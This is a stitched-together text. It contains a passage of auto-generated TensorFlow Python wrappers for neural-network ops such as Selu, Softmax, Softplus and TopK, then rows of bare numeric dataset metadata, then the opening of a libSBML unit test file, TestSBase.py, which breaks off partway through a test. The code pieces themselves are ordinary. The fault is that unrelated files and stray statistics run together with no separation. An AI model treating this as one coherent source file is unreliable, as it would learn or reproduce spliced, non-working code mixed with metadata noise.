features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Selu", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return selu_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
selu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Selu", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
selu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Selu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Selu = tf_export("raw_ops.Selu")(_ops.to_raw_op(selu))
def selu_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Selu", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Selu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def selu_grad(gradients, outputs, name=None):
r"""Computes gradients for the scaled exponential linear (Selu) operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding Selu operation.
outputs: A `Tensor`. Must have the same type as `gradients`.
The outputs of the corresponding Selu operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SeluGrad", name, gradients, outputs)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return selu_grad_eager_fallback(
gradients, outputs, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SeluGrad", gradients=gradients, outputs=outputs, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SeluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
SeluGrad = tf_export("raw_ops.SeluGrad")(_ops.to_raw_op(selu_grad))
def selu_grad_eager_fallback(gradients, outputs, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, outputs], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, outputs) = _inputs_T
_inputs_flat = [gradients, outputs]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SeluGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SeluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def softmax(logits, name=None):
r"""Computes softmax activations.
For each batch `i` and class `j` we have
$$softmax[i, j] = exp(logits[i, j]) / sum_j(exp(logits[i, j]))$$
Args:
logits: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
2-D with shape `[batch_size, num_classes]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `logits`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Softmax", name, logits)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softmax_eager_fallback(
logits, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Softmax", logits=logits, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Softmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Softmax = tf_export("raw_ops.Softmax")(_ops.to_raw_op(softmax))
def softmax_eager_fallback(logits, name, ctx):
_attr_T, (logits,) = _execute.args_to_matching_eager([logits], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [logits]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Softmax", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Softmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_SoftmaxCrossEntropyWithLogitsOutput = collections.namedtuple(
"SoftmaxCrossEntropyWithLogits",
["loss", "backprop"])
def softmax_cross_entropy_with_logits(features, labels, name=None):
r"""Computes softmax cross entropy cost and gradients to backpropagate.
Inputs are the logits, not probabilities.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
batch_size x num_classes matrix
labels: A `Tensor`. Must have the same type as `features`.
batch_size x num_classes matrix
The caller must ensure that each batch of labels represents a valid
probability distribution.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (loss, backprop).
loss: A `Tensor`. Has the same type as `features`.
backprop: A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SoftmaxCrossEntropyWithLogits", name, features, labels)
_result = _SoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softmax_cross_entropy_with_logits_eager_fallback(
features, labels, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SoftmaxCrossEntropyWithLogits", features=features, labels=labels,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
SoftmaxCrossEntropyWithLogits = tf_export("raw_ops.SoftmaxCrossEntropyWithLogits")(_ops.to_raw_op(softmax_cross_entropy_with_logits))
def softmax_cross_entropy_with_logits_eager_fallback(features, labels, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([features, labels], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(features, labels) = _inputs_T
_inputs_flat = [features, labels]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SoftmaxCrossEntropyWithLogits", 2,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
@_dispatch.add_dispatch_list
@tf_export('math.softplus', 'nn.softplus')
def softplus(features, name=None):
r"""Computes softplus: `log(exp(features) + 1)`.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Softplus", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softplus_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
softplus, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Softplus", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
softplus, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Softplus", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Softplus = tf_export("raw_ops.Softplus")(_ops.to_raw_op(softplus))
def softplus_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Softplus", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Softplus", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def softplus_grad(gradients, features, name=None):
r"""Computes softplus gradients for a softplus operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding softplus operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding softplus operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SoftplusGrad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softplus_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SoftplusGrad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SoftplusGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
SoftplusGrad = tf_export("raw_ops.SoftplusGrad")(_ops.to_raw_op(softplus_grad))
def softplus_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SoftplusGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SoftplusGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.softsign', 'math.softsign')
def softsign(features, name=None):
r"""Computes softsign: `features / (abs(features) + 1)`.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Softsign", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softsign_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
softsign, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Softsign", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
softsign, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Softsign", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Softsign = tf_export("raw_ops.Softsign")(_ops.to_raw_op(softsign))
def softsign_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Softsign", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Softsign", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def softsign_grad(gradients, features, name=None):
r"""Computes softsign gradients for a softsign operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding softsign operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding softsign operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SoftsignGrad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softsign_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SoftsignGrad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SoftsignGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
SoftsignGrad = tf_export("raw_ops.SoftsignGrad")(_ops.to_raw_op(softsign_grad))
def softsign_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SoftsignGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SoftsignGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_SparseSoftmaxCrossEntropyWithLogitsOutput = collections.namedtuple(
"SparseSoftmaxCrossEntropyWithLogits",
["loss", "backprop"])
def sparse_softmax_cross_entropy_with_logits(features, labels, name=None):
r"""Computes softmax cross entropy cost and gradients to backpropagate.
Unlike `SoftmaxCrossEntropyWithLogits`, this operation does not accept
a matrix of label probabilities, but rather a single label per row
of features. This label is considered to have probability 1.0 for the
given row.
Inputs are the logits, not probabilities.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
batch_size x num_classes matrix
labels: A `Tensor`. Must be one of the following types: `int32`, `int64`.
batch_size vector with values in [0, num_classes).
This is the label for the given minibatch entry.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (loss, backprop).
loss: A `Tensor`. Has the same type as `features`.
backprop: A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SparseSoftmaxCrossEntropyWithLogits", name, features, labels)
_result = _SparseSoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return sparse_softmax_cross_entropy_with_logits_eager_fallback(
features, labels, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SparseSoftmaxCrossEntropyWithLogits", features=features,
labels=labels, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "Tlabels",
_op._get_attr_type("Tlabels"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SparseSoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SparseSoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
SparseSoftmaxCrossEntropyWithLogits = tf_export("raw_ops.SparseSoftmaxCrossEntropyWithLogits")(_ops.to_raw_op(sparse_softmax_cross_entropy_with_logits))
def sparse_softmax_cross_entropy_with_logits_eager_fallback(features, labels, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_attr_Tlabels, (labels,) = _execute.args_to_matching_eager([labels], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int64)
_inputs_flat = [features, labels]
_attrs = ("T", _attr_T, "Tlabels", _attr_Tlabels)
_result = _execute.execute(b"SparseSoftmaxCrossEntropyWithLogits", 2,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SparseSoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SparseSoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
_TopKOutput = collections.namedtuple(
"TopK",
["values", "indices"])
def top_k(input, k, sorted=True, name=None):
r"""Finds values and indices of the `k` largest elements for the last dimension.
If the input is a vector (rank-1), finds the `k` largest entries in the vector
and outputs their values and indices as vectors. Thus `values[j]` is the
`j`-th largest entry in `input`, and its index is `indices[j]`.
For matrices (resp. higher rank input), computes the top `k` entries in each
row (resp. vector along the last dimension). Thus,
values.shape = indices.shape = input.shape[:-1] + [k]
If two elements are equal, the lower-index element appears first.
If `k` varies dynamically, use `TopKV2` below.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
1-D or higher with last dimension at least `k`.
k: An `int` that is `>= 0`.
Number of top elements to look for along the last dimension (along each
row for matrices).
sorted: An optional `bool`. Defaults to `True`.
If true the resulting `k` elements will be sorted by the values in
descending order.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (values, indices).
values: A `Tensor`. Has the same type as `input`.
indices: A `Tensor` of type `int32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TopK", name, input, "k", k, "sorted", sorted)
_result = _TopKOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return top_k_eager_fallback(
input, k=k, sorted=sorted, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
k = _execute.make_int(k, "k")
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TopK", input=input, k=k, sorted=sorted, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("k", _op._get_attr_int("k"), "sorted",
_op._get_attr_bool("sorted"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TopK", _inputs_flat, _attrs, _result)
_result = _TopKOutput._make(_result)
return _result
TopK = tf_export("raw_ops.TopK")(_ops.to_raw_op(top_k))
def top_k_eager_fallback(input, k, sorted, name, ctx):
k = _execute.make_int(k, "k")
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [input]
_attrs = ("k", k, "sorted", sorted, "T", _attr_T)
_result = _execute.execute(b"TopK", 2, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TopK", _inputs_flat, _attrs, _result)
_result = _TopKOutput._make(_result)
return _result
_TopKV2Output = collections.namedtuple(
"TopKV2",
["values", "indices"])
def top_kv2(input, k, sorted=True, name=None):
r"""Finds values and indices of the `k` largest elements for the last dimension.
If the input is a vector (rank-1), finds the `k` largest entries in the vector
and outputs their values and indices as vectors. Thus `values[j]` is the
`j`-th largest entry in `input`, and its index is `indices[j]`.
For matrices (resp. higher rank input), computes the top `k` entries in each
row (resp. vector along the last dimension). Thus,
values.shape = indices.shape = input.shape[:-1] + [k]
If two elements are equal, the lower-index element appears first.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
1-D or higher with last dimension at least `k`.
k: A `Tensor` of type `int32`.
0-D. Number of top elements to look for along the last dimension (along each
row for matrices).
sorted: An optional `bool`. Defaults to `True`.
If true the resulting `k` elements will be sorted by the values in
descending order.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (values, indices).
values: A `Tensor`. Has the same type as `input`.
indices: A `Tensor` of type `int32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TopKV2", name, input, k, "sorted", sorted)
_result = _TopKV2Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return top_kv2_eager_fallback(
input, k, sorted=sorted, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TopKV2", input=input, k=k, sorted=sorted, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("sorted", _op._get_attr_bool("sorted"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TopKV2", _inputs_flat, _attrs, _result)
_result = _TopKV2Output._make(_result)
return _result
TopKV2 = tf_export("raw_ops.TopKV2")(_ops.to_raw_op(top_kv2))
def top_kv2_eager_fallback(input, k, sorted, name, ctx):
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
k = _ops.convert_to_tensor(k, _dtypes.int32)
_inputs_flat = [input, k]
_attrs = ("sorted", sorted, "T", _attr_T)
_result = _execute.execute(b"TopKV2", 2, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TopKV2", _inputs_flat, _attrs, _result)
_result = _TopKV2Output._make(_result)
return _result
| 47.776829
| 365
| 0.686183
| 70,978
| 548,048
| 4.967455
| 0.013976
| 0.021697
| 0.011334
| 0.009513
| 0.929307
| 0.923027
| 0.912482
| 0.906064
| 0.898729
| 0.892334
| 0
| 0.014834
| 0.210332
| 548,048
| 11,470
| 366
| 47.780994
| 0.79986
| 0.257817
| 0
| 0.849313
| 1
| 0
| 0.129812
| 0.039365
| 0
| 0
| 0
| 0.001046
| 0
| 1
| 0.025968
| false
| 0.025968
| 0.001623
| 0
| 0.081523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
71820d12bab098d7930dfa657e13c499f2bbf944
| 166
|
py
|
Python
|
cracking_the_coding_interview_qs/16.13/half_square.py
|
angelusualle/algorithms
|
86286a49db2a755bc57330cb455bcbd8241ea6be
|
[
"Apache-2.0"
] | null | null | null |
cracking_the_coding_interview_qs/16.13/half_square.py
|
angelusualle/algorithms
|
86286a49db2a755bc57330cb455bcbd8241ea6be
|
[
"Apache-2.0"
] | null | null | null |
cracking_the_coding_interview_qs/16.13/half_square.py
|
angelusualle/algorithms
|
86286a49db2a755bc57330cb455bcbd8241ea6be
|
[
"Apache-2.0"
] | null | null | null |
def half_square(sq1, sq2):
return (((sq1[0][0] + sq1[1][0]) / 2.0, (sq1[0][1] + sq1[1][1]) / 2.0), ((sq2[0][0] + sq2[1][0]) / 2.0, (sq2[0][1] + sq2[1][1]) / 2.0))
| 83
| 139
| 0.445783
| 38
| 166
| 1.921053
| 0.236842
| 0.109589
| 0.082192
| 0.109589
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.244604
| 0.162651
| 166
| 2
| 139
| 83
| 0.280576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
718fcc0b809d5056209169b3c8470cd3491d482a
| 61,845
|
py
|
Python
|
src/libSBML/src/bindings/python/test/sbml/TestSBase.py
|
copasi/copasi-dependencies
|
c01dd455c843522375c32c2989aa8675f59bb810
|
[
"Unlicense"
] | 5
|
2015-04-16T14:27:38.000Z
|
2021-11-30T14:54:39.000Z
|
src/libSBML/src/bindings/python/test/sbml/TestSBase.py
|
copasi/copasi-dependencies
|
c01dd455c843522375c32c2989aa8675f59bb810
|
[
"Unlicense"
] | 8
|
2017-05-30T16:58:39.000Z
|
2022-02-22T16:51:34.000Z
|
src/libSBML/src/bindings/python/test/sbml/TestSBase.py
|
copasi/copasi-dependencies
|
c01dd455c843522375c32c2989aa8675f59bb810
|
[
"Unlicense"
] | 7
|
2016-05-29T08:12:59.000Z
|
2019-05-02T13:39:25.000Z
|
#
# @file TestSBase.py
# @brief SBase unit tests
#
# @author Akiya Jouraku (Python conversion)
# @author Ben Bornstein
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestSBase.cpp
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
import sys
import unittest
import libsbml
def wrapString(s):
return s
pass
class TestSBase(unittest.TestCase):
global S
S = None
def setUp(self):
self.S = libsbml.Model(2,4)
if (self.S == None):
pass
pass
def tearDown(self):
self.S = None
pass
def test_SBase_CVTerms(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_IS)
cv.addResource( "foo")
self.assert_( self.S.getNumCVTerms() == 0 )
#self.assert_( self.S.getCVTerms() == None )
self.assert_( len(self.S.getCVTerms()) == 0 )
self.S.setMetaId( "_id")
self.S.addCVTerm(cv)
self.assert_( self.S.getNumCVTerms() == 1 )
#self.assert_( self.S.getCVTerms() != None )
self.assert_( len(self.S.getCVTerms()) == 1 )
self.assert_( self.S.getCVTerm(0) != cv )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_addCVTerms(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_ENCODES)
cv.addResource( "foo")
self.S.setMetaId( "sbase1")
self.S.addCVTerm(cv)
self.assert_( self.S.getNumCVTerms() == 1 )
#self.assert_( self.S.getCVTerms() != None )
self.assert_( len(self.S.getCVTerms()) == 1 )
